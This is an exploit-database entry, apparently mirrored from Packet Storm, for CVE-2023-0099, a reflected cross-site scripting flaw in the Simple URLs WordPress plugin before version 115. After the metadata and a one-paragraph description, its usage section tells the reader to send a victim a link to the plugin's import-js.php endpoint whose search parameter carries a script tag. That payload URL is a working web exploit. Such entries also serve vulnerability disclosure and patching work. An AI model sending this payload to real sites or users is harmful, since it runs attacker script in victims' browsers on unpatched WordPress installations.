Share
## https://sploitus.com/exploit?id=PACKETSTORM:176983
# Exploit Title: simple urls < 115 XSS  
# Google Dork:  
# Exploit Author: AmirZargham  
# Vendor Homepage: https://getlasso.co/  
# Software Link: https://wordpress.org/plugins/simple-urls/  
# Version: < 115  
# Tested on: firefox,chrome  
# CVE: CVE-2023-0099  
# CWE: CWE-79  
# Platform: MULTIPLE  
# Type: WebApps  
  
  
Description  
The Simple URLs WordPress plugin before 115 does not sanitise and escape  
some parameters before outputting them back in some pages, leading to  
Reflected Cross-Site Scripting.  
  
  
Usage Info:  
  
send malicious link to victim:  
https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=  
<script>alert(origin)</script>